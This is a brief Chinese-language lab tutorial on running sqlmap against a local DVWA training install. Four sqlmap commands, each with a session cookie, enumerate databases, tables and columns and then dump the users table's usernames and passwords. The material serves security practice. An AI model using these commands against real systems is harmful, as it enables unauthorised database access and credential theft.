前提准備條件:
1.下載安裝dvwa,下載鏈接地址:http://www.dvwa.co.uk/。
2.需要安裝python運行環境。
3.下載sqlmap包並將其解壓。
一、查看所有的數據庫;(其中dbs表示顯示所有數據庫)
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch --dbs
二、查看數據里的所有表:(其中-D dvwa 是選擇數據庫dvwa)
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa --tables
三、查看表中的數據:(其中-T users 選擇數據表users)
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users --columns
四、查看表中的user表的用戶名和密碼
sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users -C "user,password" --dump
